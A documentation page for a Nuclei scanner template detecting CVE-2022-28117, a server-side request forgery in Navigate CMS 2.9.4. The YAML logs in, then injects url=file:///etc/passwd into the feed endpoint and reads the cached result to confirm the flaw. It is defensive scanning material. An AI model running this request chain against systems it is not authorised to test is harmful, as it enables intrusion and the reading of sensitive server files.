Navigate CMS 2.9.4 - Server-Side Request Forgery
ID: CVE-2022-28117
Severity: medium
Author: theabhinavgaur
Tags: cve,cve2022,authenticated,packetstorm,ssrf,navigate,cms,lfi,intrusive,naviwebs
Description
Section titled “Description”Navigate CMS 2.9.4 is susceptible to server-side request forgery via feed_parser class. This can allow a remote attacker to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter, thus enabling possible theft of sensitive information, data modification, and/or unauthorized operation execution.
YAML Source
Section titled “YAML Source”id: CVE-2022-28117
info: name: Navigate CMS 2.9.4 - Server-Side Request Forgery author: theabhinavgaur severity: medium description: | Navigate CMS 2.9.4 is susceptible to server-side request forgery via feed_parser class. This can allow a remote attacker to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter, thus enabling possible theft of sensitive information, data modification, and/or unauthorized operation execution. impact: | An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks. remediation: | Upgrade to a patched version of Navigate CMS or apply the vendor-provided patch to mitigate the SSRF vulnerability. reference: - https://packetstormsecurity.com/files/167063/Navigate-CMS-2.9.4-Server-Side-Request-Forgery.html - https://www.navigatecms.com/en/blog/development/navigate_cms_update_2_9_5 - https://www.youtube.com/watch?v=4kHW95CMfD0 - https://nvd.nist.gov/vuln/detail/CVE-2022-28117 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N cvss-score: 4.9 cve-id: CVE-2022-28117 cwe-id: CWE-918 epss-score: 0.04745 epss-percentile: 0.92658 cpe: cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: naviwebs product: navigate_cms tags: cve,cve2022,authenticated,packetstorm,ssrf,navigate,cms,lfi,intrusive,naviwebs
http: - raw: - | GET /navigate/login.php HTTP/1.1 Host: {{Hostname}} - | POST /navigate/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890
-----------------------------123456789012345678901234567890 Content-Disposition: form-data; name="login-username"
{{username}} -----------------------------123456789012345678901234567890 Content-Disposition: form-data; name="csrf_token"
{{csrf_token}} -----------------------------123456789012345678901234567890 Content-Disposition: form-data; name="login-password"
{{password}} -----------------------------123456789012345678901234567890 - | POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8
limit=5&language=en&url=file:///etc/passwd - | GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: status status: - 200
extractors: - type: regex name: csrf_token group: 1 regex: - csrf_token" value="([a-f0-9]{64}) internal: true part: body# digest: 490a0046304402206da25068dc65746170aa84131680fd50569da3330b6d593e2369bb7ff63d65360220694a66a3d3fb6b9d3bb47d9f6e3a7f7250c8c05e7b50387e4cd2958b0f8e04f0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-28117.yaml"